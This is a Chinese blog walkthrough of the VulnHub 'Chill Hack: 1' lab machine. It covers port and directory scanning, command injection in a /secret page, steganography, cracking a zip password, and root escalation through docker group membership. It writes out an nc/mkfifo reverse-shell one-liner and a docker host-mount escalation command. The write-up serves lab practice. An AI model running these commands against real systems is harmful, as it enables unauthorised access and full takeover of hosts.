vulnhub-Chill Hack: 1

靶机描述

下载 https://www.vulnhub.com/entry/chill-hack-1,622/

清单

  • 信息搜集

    • nmap
    • 命令执行漏洞
    • 端口转发
    • 图片隐写
    • 压缩包密码破解
  • 提权

    • docker 组

信息搜集

靶机IP

image-20210206163330182

端口扫描

nmap 192.168.31.35

PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http

目录扫描

dirb http://192.168.31.35

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sat Feb  6 14:28:19 2021
URL_BASE: http://192.168.31.35/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.31.35/ ----
==> DIRECTORY: http://192.168.31.35/css/                                                                                                                              
==> DIRECTORY: http://192.168.31.35/fonts/                                                                                                                            
==> DIRECTORY: http://192.168.31.35/images/                                                                                                                           
+ http://192.168.31.35/index.html (CODE:200|SIZE:35184)                                                                                                               
==> DIRECTORY: http://192.168.31.35/js/                                                                                                                               
==> DIRECTORY: http://192.168.31.35/secret/ 

其中 secret 中有命令执行

通过

r''m /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.31.171 1234 >/tmp/f

得到 shell

提升权限 - anurodh

进入之后发现个 9001 端口 转发出来是一个网页

在数据库拿到 用户名后 登入进去 出现如下图片

image-20210206163906995

在看过 wp 之后图中的images/hacker-with-laptop_23-2147985341.jpg

带有隐藏信息

image-20210206164419939

分离后的压缩包带有密码

image-20210206164812891

得到密码 pass1word

解压过后有个 php文件

image-20210206171053140

base64解码后得到密码

!d0ntKn0wmYp@ssw0rd

得到 root

使用 ssh登陆

image-20210206171205259

用户anurodh 为 docker用户组

输入

docker run -v /:/hostOS -i -t chrisfosterelli/rootplease

得到 root

image-20210206171248610

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值